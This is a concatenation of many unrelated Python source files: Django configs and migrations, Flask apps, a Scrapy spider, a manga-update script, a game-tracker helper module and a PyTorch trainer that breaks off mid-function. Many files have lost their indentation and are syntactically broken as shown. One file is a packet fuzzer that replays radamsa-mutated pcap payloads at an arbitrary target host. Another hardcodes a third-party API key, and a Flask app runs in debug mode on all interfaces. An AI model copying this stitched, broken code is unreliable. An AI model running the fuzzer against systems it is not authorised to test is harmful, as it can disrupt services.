print (a) |
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
url(r'^$', 'aplicativo.views.home', name='home'),
url(r'^mostrarTab/(?P<namespace>\S+)/$', 'aplicativo.views.mostrar_tab', name='mostrarTab'),
# url(r'^trocas/', include('trocas.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
|
"""
Azure provides a set of services for Microsoft Azure provider.
"""
from diagrams import Node
class _Azure(Node):
_provider = "azure"
_icon_dir = "resources/azure"
fontcolor = "#ffffff"
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import mptt.fields
from django.conf import settings
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UserModel',
fields=[
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('is_superuser', models.BooleanField(help_text='Designates that this user has all permissions without explicitly assigning them.', default=False, verbose_name='superuser status')),
('email', models.EmailField(unique=True, verbose_name='email address', max_length=75, primary_key=True, serialize=False)),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
('is_staff', models.BooleanField(help_text='Designates whether the user can log into this admin site.', default=False, verbose_name='staff status')),
('validated_at', models.DateTimeField(editable=False, null=True, default=None, verbose_name='DateTime an account is validated')),
('is_active', models.BooleanField(help_text='Designates whether the active flag of the user. ', default=True, verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', to='auth.Group', related_query_name='user', related_name='user_set', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', to='auth.Permission', related_query_name='user', related_name='user_set', verbose_name='user permissions')),
],
options={
'swappable': 'AUTH_USER_MODEL',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('is_active', models.BooleanField(editable=False, default=True, verbose_name='Is the object active')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created time object')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Last time the object was updated')),
('title', models.CharField(verbose_name='Title', null=True, default=None, max_length=1024)),
('description', models.CharField(verbose_name='Description', null=True, default=None, max_length=20480)),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('created_by', models.ForeignKey(related_name='category_created', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='User who created the object')),
('parent', mptt.fields.TreeForeignKey(to='unavis.Category', null=True, blank=True, related_name='children')),
('updated_by', models.ForeignKey(related_name='category_updated', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='Last user who updated object')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('is_active', models.BooleanField(editable=False, default=True, verbose_name='Is the object active')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created time object')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Last time the object was updated')),
('title', models.CharField(verbose_name='Title', null=True, default=None, max_length=1024)),
('description', models.CharField(verbose_name='Description', null=True, default=None, max_length=20480)),
('slug', models.SlugField(editable=False, verbose_name='Slug')),
('category', models.ForeignKey(to='unavis.Category', editable=False, related_name='pages')),
('created_by', models.ForeignKey(related_name='page_created', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='User who created the object')),
('updated_by', models.ForeignKey(related_name='page_updated', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='Last user who updated object')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('is_active', models.BooleanField(editable=False, default=True, verbose_name='Is the object active')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created time object')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Last time the object was updated')),
('title', models.CharField(verbose_name='Title', null=True, default=None, max_length=1024)),
('description', models.CharField(verbose_name='Description', null=True, default=None, max_length=20480)),
('note', models.PositiveSmallIntegerField(default=0, verbose_name='Global note')),
('created_by', models.ForeignKey(related_name='review_created', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='User who created the object')),
('page', models.ForeignKey(to='unavis.Page')),
('updated_by', models.ForeignKey(related_name='review_updated', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='Last user who updated object')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
|
#!/usr/bin/env python
# Author: Ben Langmead <ben.langmead@gmail.com>
# License: MIT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
|
from flask import Flask, render_template
app=Flask(__name__)
@app.route('/')
@app.route('/home')
def home():
return render_template('home.html',title='home')
@app.route('/jelly')
def jelly():
return render_template('jelly.html')
@app.route('/fish')
def fish():
return render_template('fish.html')
@app.route('/jellyfish')
def jellyfish():
return render_template('jellyfish.html')
@app.route('/s')
@app.route('/secret')
@app.route('/s/<rotv>')
@app.route('/secret/<rotv>')
@app.route('/s/<rotv>/<encrypt>')
@app.route('/secret/<rotv>/<encrypt>')
def secret(rotv='0', encrypt='0'):
import rot
d={'to_encrypt':encrypt,
'rotval':rotv}
d['encrypted']=rot.rotx(encrypt,int(rotv))
return render_template("secret.html",d=d)
if __name__=='__main__':
app.debug=True
app.run(host='0.0.0.0', port=8000)
|
# ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from __future__ import print_function
import json
import pkgutil
import unittest
from twitter.thrift.text import thrift_json_encoder
from gen.twitter.thrift.text.testing import ttypes as structs_for_testing
class ThriftJsonEncoderTest(unittest.TestCase):
def test_encode_thrift_to_json(self):
x = structs_for_testing.TestStruct()
x.field2 = True
x.field4 = [2, 4, 6, 8]
x.field7 = 1.2
expected1 = \
"""{
"field2": true,
"field4": [
2,
4,
6,
8
],
"field7": 1.2
}"""
json_str1 = thrift_json_encoder.thrift_to_json(x)
assert expected1 == json_str1
x.field1 = 42
x.field2 = False
x.field3 = '"not default"'
x.field4.append(10)
x.field5 = set(['b', 'c', 'a'])
x.field6 = structs_for_testing.InnerTestStruct()
x.field6.foo = "bar"
x.field6.color = structs_for_testing.Color.BLUE
expected2 = \
"""{
"field1": 42,
"field2": false,
"field3": "\\"not default\\"",
"field4": [
2,
4,
6,
8,
10
],
"field5": [
"a",
"b",
"c"
],
"field6": {
"color": 3,
"foo": "bar"
},
"field7": 1.2
}"""
json_str2 = thrift_json_encoder.thrift_to_json(x)
print(json_str2)
assert expected2 == json_str2
|
#!/usr/bin/python
# fussel.py is a stupid fuzzer. using pcap, scapy and radamsa
import scapy.all as scapy
from subprocess import Popen, PIPE
import ssl
import socket
import random
import time
import argparse
import sys
import os.path
import string  # print_buf needs string.printable
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def is_valid_ip4(ip):
    # some rudimentary checks if ip is actually a valid IPv4 address
    octets = ip.split('.')
    if len(octets) != 4:
        return False
    try:
        return int(octets[0]) != 0 and all(0 <= int(octet) <= 255 for octet in octets)
    except ValueError:
        return False
def parse_args():
parser = argparse.ArgumentParser(description='simple stupid pcap fuzzer')
parser.add_argument('-t', '--target-ip', dest='target_ip', required=True, help='remote target IP')
parser.add_argument('-p', '--target-port', dest='target_port', required=True, help='remote target port')
parser.add_argument('-i', '--input-pcap', dest='input_pcap', required=True, help='input pcap file')
parser.add_argument('-f', '--fuzz_factor', dest='fuzz_factor', required=False, help='fuzz factor, default: 50', default=50.0)
parser.add_argument('-r', '--radamsa_path', dest='radamsa_path', required=False, help='path to radamsa binary', default='/usr/bin/radamsa')
parser.add_argument('-v', '--verbose', dest='verbose', default=False,action='store_true',help='More verbose output of status information')
return parser.parse_args()
def print_buf(counter, buf):
buf2 = [('%02x' % ord(i)) for i in buf]
print '{0}: {1:<39} {2}'.format(('%07x' % (counter * 16)),
' '.join([''.join(buf2[i:i + 2]) for i in range(0, len(buf2), 2)]),
''.join([c if c in string.printable[:-5] else '.' for c in buf]))
def hexdump(data, length=12):
# this is a pretty hex dumping function directly taken from
# http://code.activestate.com/recipes/142812-hex-dumper/
result = []
digits = 4 if isinstance(data, unicode) else 2
for i in xrange(0, len(data), length):
s = data[i:i + length]
hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
result.append(b"%04X %-*s %s" % (i, length * (digits + 1), hexa, text))
print b'\n'.join(result)
def launch_radamsa(payload, radamsa_path):
radamsa = [radamsa_path, '-n', '1', '-']
p = Popen(radamsa, stdin=PIPE, stdout=PIPE)
p.stdin.write(payload)
p.stdin.close()
p.wait()
mutated_data = p.stdout.read()
return mutated_data
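# e.g. launch_radamsa('GET / HTTP/1.1\r\n\r\n', '/usr/bin/radamsa') pipes the
# payload through radamsa once ('-n', '1') and returns a single mutated variant.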
def log_data(event, log_data):
    log_output = log_data + '\n'
    file_d = None
    if event == 'fuzzing':
        try:
            file_d = open('fuzzing.log', 'a')
        except IOError as err:
            return "[!] Error opening log file: %s" % str(err)
    elif event == 'error':
        try:
            file_d = open('error.log', 'a')
        except IOError as err:
            return "[!] Error opening error file: %s" % str(err)
    if file_d:
        file_d.write(log_output)
        file_d.close()
    return
def main():
clientsIP_list = []
serversIP_list = []
fuzz_list = []
random.seed(time.time())
'''
parsing arguments
'''
args = parse_args()
if not is_valid_ip4(args.target_ip):
sys.exit(1)
else:
target_ip = args.target_ip
if os.path.isfile(args.input_pcap):
input_pcap_filename = args.input_pcap
else:
sys.exit(2)
if os.path.isfile(args.radamsa_path):
radamsa_path = args.radamsa_path
else:
sys.exit(3)
fuzz_factor = args.fuzz_factor
target_port = args.target_port
    print '[!] Analyzing PCAP: ' + input_pcap_filename
packets = scapy.rdpcap(input_pcap_filename)
print '[+] Identified %d packets in PCAP' % len(packets)
time.sleep(1)
count = 0
for pkt in packets:
''' Only interested if pkt starts with SYN flag. Hosts sending SYN will be clients, the DstIP will be servers'''
        if count == 0:
if pkt['TCP'].sprintf('%TCP.flags%') == 'S':
clientsIP_list.append(pkt['IP'].src)
serversIP_list.append(pkt['IP'].dst)
count += 1
try:
if pkt['Raw']:
            '''
            Check the information flow direction. At this point, only data
            sent to the target is of interest for mutation.
            '''
if pkt['IP'].src in clientsIP_list:
print '[+] Identified data to fuzz in packet: %d' % count
fuzz_list.append((count, str(pkt['Raw'])))
except IndexError:
continue
fuzz_count = 0
while True:
print bcolors.OKGREEN + '[+] Fuzzing: %d ' % fuzz_count + bcolors.ENDC
try:
fuzz_count += 1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
''' in case the server uses TLS '''
sock.connect((target_ip, int(target_port)))
#ssl_sock = ssl.wrap_socket(sock)
#ssl_sock.connect((target_ip, int(target_port)))
for pkt in fuzz_list:
fuzz_payload = pkt[1]
''' fuzz payload? '''
ran = random.random()
if ran < float(fuzz_factor) / 100:
fuzz_payload = launch_radamsa(fuzz_payload, radamsa_path)
#log_data('fuzzing', fuzz_payload)
if args.verbose is True:
hexdump(fuzz_payload, 16)
sock.send(fuzz_payload)
#sock.recv(1024)
#sock.close()
except IOError, e:
#print str(e)
continue
except Exception as error:
error_str = bcolors.FAIL + '[!!!] Error during fuzz iteration #%d\nError Message: %s' %(fuzz_count, str(error)) + bcolors.ENDC
print error_str
if __name__ == '__main__':
main()
|
from .models import UserAccount, EventPlace, EventPlaceSeatType, Contract, Ticket
from django.contrib.auth.models import Group
from django.contrib import admin
from django import forms
class EventPlaceAdmin(admin.ModelAdmin):
list_display = ('name', 'adress', 'open_air')
list_filter = ('name',)
class ContractAdmin(admin.ModelAdmin):
list_display = ('event_title', 'event_date', 'event_place')
change_form_template = 'admin/contract_forms.html'
admin.site.site_header = 'Control panel:'
admin.site.register(UserAccount)
admin.site.register(EventPlace, EventPlaceAdmin)
admin.site.register(EventPlaceSeatType)
admin.site.register(Contract, ContractAdmin)
admin.site.register(Ticket)
admin.site.unregister(Group) |
#_*_ coding:utf-8 _*_
# How to run: scrapy crawl pursuit  ("pursuit" is the spider name defined below)
#scrapy crawl pursuit -o pursuit_teacher.json -t json
import scrapy
from mySpider.items import PursuitItem
class PursuitSpider(scrapy.spiders.Spider):
    # these attribute names are built into Scrapy
name = "pursuit"
    allowed_domains = ["itcast.cn"]  # domains only, without the scheme
start_urls = ["http://www.itcast.cn/channel/teacher.shtml#ac"]
def parse(self,response):
# file_name = "teacher.html"
# open(file_name,"wb+").write(response.body)
items = []
for site in response.xpath('//div[@class="li_txt"]'):
teacher_name = site.xpath('h3/text()').extract()
teacher_level = site.xpath('h4/text()').extract()
teacher_info = site.xpath('p/text()').extract()
item = PursuitItem()
item['name'] = teacher_name
item['level'] = teacher_level
item['info'] = teacher_info
items.append(item)
return items
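# Note: returning the collected list works, but the idiomatic Scrapy pattern is
# to `yield item` inside the loop so items stream through the item pipeline.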
|
from django.contrib.gis import admin
from world.models import WorldBorder
admin.site.register(WorldBorder, admin.OSMGeoAdmin)
# admin.site.register(WorldBorder, admin.GeoModelAdmin)
|
import cloudscraper
import time, os, sys, re, json, html
mangas = []
def remove_special_char(str):
return ''.join(e for e in str if e.isalnum())
def pad_filename(str):
digits = re.compile('(\\d+)')
pos = digits.search(str)
if pos:
return str[1:pos.start()] + pos.group(1).zfill(3) + str[pos.end():]
else:
return str
def float_conversion(x):
y = x[0]
try:
y = float(y)
except ValueError: # empty string for oneshot
y = 0
return y
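# Shape of profile.json assumed by the functions below (reconstructed from the
# fields they read and write; values are illustrative):
#
#   [  # outer list: categories
#     [  # inner list: mangas in one category
#       {"title": "...", "title_id": "12345",
#        "url": "https://mangadex.org/api/manga/12345/",
#        "cover_url": "...", "recent_read": 0, "recent_update": 0,
#        "new_update": [], "tld": "org"},
#     ],
#   ]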
def update(category, index, manga_id, lang_code, tld="org"):
global mangas
# grab manga info json from api
scraper = cloudscraper.create_scraper()
try:
r = scraper.get(mangas[category][index]["url"])
manga = json.loads(r.text)
# print(manga)
except (json.decoder.JSONDecodeError, ValueError) as err:
print("CloudFlare error: {}".format(err))
exit(1)
try:
title = manga["manga"]["title"]
title = remove_special_char(title)
except:
print("Please enter a MangaDex manga (not chapter) URL.")
exit(1)
# print("\nTitle: {}".format(html.unescape(title)))
# check available chapters
chapters = []
if "chapter" not in manga:
print("Chapter not found in the language you requested.")
exit(1)
for chap in manga["chapter"]:
if manga["chapter"][str(chap)]["lang_code"] == lang_code:
chapters.append((manga["chapter"][str(chap)]["chapter"], manga["chapter"][str(chap)]["timestamp"]))
chapters.sort(key=float_conversion) # sort numerically by chapter #
    # keep (chapter, timestamp) pairs so the loop below can unpack them;
    # an empty chapter string marks a oneshot, so label it explicitly
    chapters_revised = [("Oneshot", ts) if ch == "" else (ch, ts) for ch, ts in chapters]
recently_updated = []
to_download = []
recent_update = mangas[category][index]['recent_update']
mostrecent = mangas[category][index]['recent_update']
# print(chapters_revised)
for chapter, timestamp in chapters_revised:
if int(timestamp) > recent_update:
if int(timestamp) > mostrecent:
mostrecent = int(timestamp)
recently_updated.append(chapter)
# print(recently_updated)
recently_read = float(mangas[category][index]['recent_read'])
        if recently_read == 0:
            if chapter == 'Oneshot':
                to_download.append(chapter)
        if chapter != 'Oneshot':
            if recently_read < float(chapter):
                to_download.append(chapter)
if manga['manga']['cover_url'].rsplit('/',1)[1] != mangas[category][index]['cover_url'].rsplit('/',1)[1]:
mangas[category][index]['cover_url'] = mangas[category][index]['cover_url'].rsplit('/',1)[0] + '/' + manga['manga']['cover_url'].rsplit('/',1)[1]
mangas[category][index]['recent_update'] = mostrecent
mangas[category][index]['new_update'] = recently_updated
with open('profile.json', 'w') as outfile:
json.dump(mangas, outfile)
# print(recently_updated)
# print(to_download)
return recently_updated, to_download
def update_all_mangas(category):
lang_code = "gb"
global mangas
with open('profile.json', 'r') as infile:
mangas = json.load(infile)
# with open('profile.json', 'r') as infile:
# mangas = json.load(infile)
# url = ""
# while url == "":
# url = input("Enter new manga url or none for done: ").strip()
# if url == "none":
# break
# manga_id = re.search("[0-9]+", url).group(0)
# split_url = url.split("/")
# for segment in split_url:
# if "mangadex" in segment:
# url = segment.split('.')
# title_url = "https://mangadex.{}/api/manga/{}/".format(url[1], manga_id)
# new = {
# "title": split_url[-1],
# "title_id": manga_id,
# "url": title_url,
# "cover_url": 'TODO make this input during making of frontend',
# "recent_read": 0,
# "recent_update": 0,
# "tld": url[1]
# }
# mangas.append(new)
# with open('profile.json', 'w') as outfile:
# json.dump(mangas, outfile)
mangacat = mangas[category]
updated_chapters = {}
to_download_chapters = {}
for i, manga in enumerate(mangacat):
try:
updates, to_download = update(category, i, manga['title_id'], lang_code, manga['tld'])
updated_chapters[manga['title']] = updates
to_download_chapters[manga['title']] = to_download
        except Exception as err:
            print("Error with URL: {}".format(err))
print("update finished!")
return updated_chapters, to_download_chapters
if __name__ == "__main__":
update_all_mangas(0)
|
from django.db.models.signals import post_save
from django.contrib.auth.models import User, Group
from .models import Subscriber
def subscriber_profile(sender, instance, created, **kwargs):
if created:
Subscriber.objects.create(
user=instance,
)
post_save.connect(subscriber_profile, sender=User)
|
import csv
import urllib.request
import json
import requests
from flask import redirect, render_template, request, session
from functools import wraps
from cs50 import SQL
from passlib.apps import custom_app_context as pwd_context
import smtplib
import random
db = SQL("sqlite:///games.db")
def login_required(f):
"""
Decorate routes to require login.
http://flask.pocoo.org/docs/0.12/patterns/viewdecorators/
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("user_id") is None:
return redirect("/login")
return f(*args, **kwargs)
return decorated_function
def lookup(name):
# get game data via database API by searching gamename
url = 'https://api-v3.igdb.com/games/'
headers = {'user-key': '663bdc9cdfcbb5aaae5a2a8a14b4d70a'}
data = f'search "{name}"; fields name, rating, summary;'
r = requests.get(url, headers=headers, json={"key": "value"}, data=data)
if not r:
return None
return r.json()
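# lookup("zelda") returns IGDB's JSON as parsed by r.json(): roughly a list of
# objects carrying the requested fields, e.g.
#   [{"id": ..., "name": ..., "rating": ..., "summary": ...}, ...]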
def delete_account(user_id):
# delete user
db.execute("DELETE FROM users WHERE id =:id", id=user_id)
return "Done"
def check_register(username, email, password):
temp_email = db.execute("SELECT * FROM users WHERE email=:email", email=email)
temp_username = db.execute("SELECT * FROM users WHERE username=:username", username=username)
if len(temp_email) == 1:
return None
elif len(temp_username) == 1:
return None
else:
newUser = db.execute("INSERT INTO users (username, hash, email) VALUES (:username, :hash, :email)",
username=username, hash=pwd_context.hash(password), email=email)
return "Done"
def addgame(game, user_id, rating, status):
# select game user searches. if no error add to database
temp = db.execute("SELECT * FROM games WHERE user_id=:user_id AND name=:name", user_id=user_id, name=game["name"])
if temp:
return "error"
else:
db.execute("INSERT INTO games (name, rating, user_id, status, userrating) VALUES (:name, :rating, :user_id, :status, :userrating)",
name=game["name"], rating=game["rating"], user_id=user_id, status=status, userrating=rating)
def get_games(user_id, status):
# select games if games in all games (*) or if it has a status
if status == "*":
games = db.execute("SELECT * FROM games WHERE user_id=:user_id", user_id=user_id)
else:
games = db.execute("SELECT * FROM games WHERE user_id=:user_id AND status=:status", user_id=user_id, status=status)
# give game a number and strip decimals in the rating
i = 1
for game in games:
game["rating"] = str(game["rating"]).split('.')[0]
game["counter"] = i
i += 1
return games
def update_game(user_id, game, status, rating):
to_update = game["name"]
    if rating is None or rating == "":
rating = db.execute("SELECT userrating FROM games WHERE user_id=:user_id AND name=:name", user_id=user_id, name=to_update)
rating = rating[0]["userrating"]
if status == "select":
status = db.execute("SELECT status FROM games WHERE user_id=:user_id AND name=:name", user_id=user_id, name=to_update)
status = status[0]["status"]
db.execute("UPDATE games SET status=:status WHERE user_id=:user_id AND name=:name",
status=status, user_id=user_id, name=to_update)
db.execute("UPDATE games SET userrating=:userrating WHERE user_id=:user_id AND name=:name",
userrating=rating, user_id=user_id, name=to_update)
return "Done"
def remove_game(name, user_id):
# delete game from user's account
db.execute("DELETE FROM games WHERE name=:name AND user_id=:user_id", name=name, user_id=user_id)
def lookup_name(name):
# search user by username
temp = db.execute("SELECT id FROM users WHERE username=:username", username=name)
if temp == []:
return None
else:
return temp
def sortrating(user_id, status):
# order games via rating if game has a status or if it is in all games (*)
if status == "*":
games = db.execute("SELECT * FROM games WHERE user_id=:user_id ORDER BY userrating DESC", user_id=user_id)
else:
games = db.execute("SELECT * FROM games WHERE user_id=:user_id AND status=:status ORDER BY userrating DESC",
user_id=user_id, status=status)
# give game a number and strip decimals in the rating
i = 1
for game in games:
game["rating"] = str(game["rating"]).split('.')[0]
game["counter"] = i
i += 1
return games
def sortalfa(user_id, status):
# order games via name if game has a status or if it is in all games (*)
if status == "*":
games = db.execute("SELECT * FROM games WHERE user_id=:user_id ORDER BY name ASC", user_id=user_id)
else:
games = db.execute("SELECT * FROM games WHERE user_id=:user_id AND status=:status ORDER BY name ASC",
user_id=user_id, status=status)
# give game a number and strip decimals in the rating
i = 1
for game in games:
game["rating"] = str(game["rating"]).split('.')[0]
game["counter"] = i
i += 1
return games
def tip_input(user_id, game, user_tip):
game_tip = game
username_tipper = db.execute("SELECT username FROM users WHERE id=:id", id=user_id)
username_tipper = username_tipper[0]["username"]
test_tip = db.execute("SELECT id FROM users WHERE username=:username", username=user_tip)
if test_tip == []:
return None
else:
username = user_tip
id = test_tip[0]["id"]
db.execute("INSERT INTO tips(username,id,game,username_tipper) VALUES (:username, :id, :game, :username_tipper)",
username=username, id=id, game=game_tip, username_tipper=username_tipper)
return "Done"
def get_tips(user_id):
games = db.execute("SELECT * FROM tips WHERE id=:id", id=user_id)
return games
def change(user_id, what, new):
if what == "email":
check = db.execute("SELECT * FROM users WHERE email=:email", email=new)
if check != []:
return None
db.execute("UPDATE users SET email=:email WHERE id=:id", email=new, id=user_id)
if what == "password":
db.execute("UPDATE users SET hash=:hash WHERE id=:id", hash=pwd_context.hash(new), id=user_id)
if what == "username":
check = db.execute("SELECT * FROM users WHERE username=:username", username=new)
if check != []:
return None
db.execute("UPDATE users SET username=:username WHERE id=:id", username=new, id=user_id)
return "Done"
def check(email, username):
valid = db.execute("SELECT email FROM users WHERE username=:username", username=username)
valid = valid[0]["email"]
if valid != email:
return None
else:
return "Done"
def code(code):
    # the incoming value is ignored; generate a fresh random reset code
    code = random.randint(1000000, 100000000)
db.execute("UPDATE users SET code= :code WHERE username=:username and email=:email",
code=code, username=request.form.get("username"), email=request.form.get("email"))
return code
def delete2(username):
print("DELETING OLD CODE")
db.execute("UPDATE users SET code=:code WHERE username=:username", code=0, username=username)
return "Done"
def update_password(newpassword, username, code):
newcode = db.execute("SELECT code FROM users WHERE username=:username", username=username)
newcode = newcode[0]["code"]
if code != newcode or code == 0:
return None
else:
print("____ UPDATING HASH____")
print(username)
db.execute("UPDATE users SET hash=:hash WHERE username=:username", hash=pwd_context.hash(newpassword), username=username)
return "Done"
|
from utils.api import fetch_from_api
from datetime import datetime
from utils.api.scoring import score_videos
from utils.mysql.get import get_videos
from utils.mysql.connect import get_mysql
def get_published_datetime(published):
return datetime.strptime(published, "%Y-%m-%dT%H:%M:%SZ")
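# e.g. get_published_datetime("2020-01-15T10:30:00Z") -> datetime(2020, 1, 15, 10, 30)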
def search(query, pages=1, max_results=50, starting_token='', threshold=0.0):
    s = []
    counts = {}
    if starting_token == '':
        s = fetch_from_api.search_videos(query, pages, max_results)
    else:
        s = fetch_from_api.search_videos(query, pages, max_results, starting_token)
# print('{} videos fetched'.format(len(s)))
counts['API'] = len(s)
not_exists = []
video_data = get_videos(get_mysql(), from_flask=False)
video_ids = list(map(lambda x: x['video_id'], video_data))
for v in s:
if v['video_id'] not in video_ids:
# if not video_exists(get_mysql(), v['video_id'], from_flask=False):
not_exists.append(v)
# print('{} not already existing videos found'.format(len(not_exists)))
counts['non-existing'] = len(not_exists)
scores = score_videos(not_exists, search_tags=False)
videos_json = {}
# print('Fetching extended data and filtering by score (threshold={})... '.format(threshold), end='')
for v in not_exists:
if scores[v['video_id']] > threshold:
details = fetch_from_api.get_video_by_id(v['video_id'])
videos_json[v['video_id']] = details
else:
pass
# print('Filtered Out (1): {}\t{}'.format(v['video_id'], v['video_title']))
#print('{} videos after filter'.format(len(videos_json)))
counts['filter 1'] = len(videos_json)
print('---Stats---')
for k, v in counts.items():
print('{}: {}'.format(k, v))
return videos_json
|
from django.contrib import admin
from .models import Wishlist
# Register your models here.
# admin.site.register(Wishlist)
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
# Challenge:
"""
Challenge #7 "Future and past age"
Instructions: ask the user for their name and age.
As an output message, tell them how old they were last year and how old they will turn next year.
Example: [name] last year you were X years old and next year you will turn Y.
"""
def main():
    name = str(raw_input("Enter your name and press ENTER: "))
    years_old = int(raw_input("Enter your age and press ENTER: "))
    last_year = years_old - 1
    next_year = years_old + 1
    print("{} last year you were {} and next year you will turn {}.".format(name, last_year, next_year))
if __name__ == '__main__':
main() |
import pprint
import eng_to_ipa as ipa
from time import sleep
class WordPronunciationPairs :
def __init__(self,word:str):
        self.word = word
        self.pronunciation = ipa.convert(word)
    def __repr__(self):
        # return a readable string (returning self here would break printing)
        return "{} [{}]".format(self.word, self.pronunciation)
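# e.g. WordPronunciationPairs("hello").pronunciation yields an IPA string
# (roughly 'hɛˈloʊ'; the exact output depends on the eng_to_ipa version)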
def cleanbaby():
inpFile = open("./wordlist/babynames.txt",'r')
lines = inpFile.read().split("\n") # splitting doc into lines
names = [x.split(",")[1][1:-2] for x in lines if(x!="")] # splitting lines into names of format 123,"123",...
longnames = [ x for x in names if(len(x)>5) ] # just handpicking names size > 5
longnames = sorted(set(longnames)) # sorting and removing duplicates
open("./wordlist/cleanedbabynames1.txt",'w').write("\n".join(longnames))# writing back to the doc
return None
def cleanGoogle():
inpFile = open("./wordlist/googleWords.txt",'r')
lines = inpFile.read().split("\n") # splitting doc into lines
#names = [x.split(",")[1][1:-2] for x in lines if(x!="")] # splitting lines into names of format 123,"123",...
longnames = [ WordPronunciationPairs(x) for x in lines if(len(x)>5) ] # just handpicking names size > 5
longnames = sorted(set(longnames),key=lambda x:x.pronunciation) # sorting and removing duplicates
uniqueWords = []
i = 0
while i < (len(longnames)):
#sleep(0.1)
srcWord = longnames[i]
uniqueWords.append(srcWord)
minMatchCount = int(0.8*len(srcWord.pronunciation))
print(i)
for j in range(i+1,len(longnames)):
if srcWord.pronunciation[:minMatchCount] != longnames[j].pronunciation[:minMatchCount] :
#uniqueWords.append(longnames[j])
i=j
break
else:
i+=1
if(i==len(longnames)-1):
uniqueWords.append(longnames[i])
i+=1
open("./wordlist/cleanGoogleWords.txt",'w').write("\n".join([x.word for x in longnames]))# writing back to the doc
open("./wordlist/cleanGoogleWords2.txt",'w').write("\n".join([x.word for x in uniqueWords]))# writing back to the doc
return None
cleanGoogle() |
from __future__ import absolute_import, division, print_function, unicode_literals
import six
import logging
from collections import OrderedDict
import numpy as np
import torch
import torch.optim as optim
from torch.utils.data import TensorDataset, DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from torch.nn.utils import clip_grad_norm_
logger = logging.getLogger(__name__)
class EarlyStoppingException(Exception):
pass
class NanException(Exception):
pass
class Trainer(object):
""" Trainer class. Any subclass has to implement the forward_pass() function. """
def __init__(self, model, run_on_gpu=True, double_precision=False):
self.model = model
self.run_on_gpu = run_on_gpu and torch.cuda.is_available()
self.device = torch.device("cuda" if self.run_on_gpu else "cpu")
self.dtype = torch.double if double_precision else torch.float
self.model = self.model.to(self.device, self.dtype)
logger.debug(
"Training on %s with %s precision",
"GPU" if self.run_on_gpu else "CPU",
"double" if double_precision else "single",
)
def train(
self,
data,
loss_functions,
loss_weights=None,
loss_labels=None,
epochs=50,
batch_size=100,
optimizer=optim.Adam,
optimizer_kwargs=None,
initial_lr=0.001,
final_lr=0.0001,
validation_split=0.25,
early_stopping=True,
early_stopping_patience=None,
clip_gradient=10.0,
verbose="some",
):
logger.debug("Initialising training data")
self.check_data(data)
self.report_data(data)
data_labels, dataset = self.make_dataset(data)
train_loader, val_loader = self.make_dataloaders(dataset, validation_split, batch_size)
logger.debug("Setting up optimizer")
optimizer_kwargs = {} if optimizer_kwargs is None else optimizer_kwargs
opt = optimizer(self.model.parameters(), lr=initial_lr, **optimizer_kwargs)
early_stopping = early_stopping and (validation_split is not None) and (epochs > 1)
best_loss, best_model, best_epoch = None, None, None
if early_stopping and early_stopping_patience is None:
logger.debug("Using early stopping with infinite patience")
elif early_stopping:
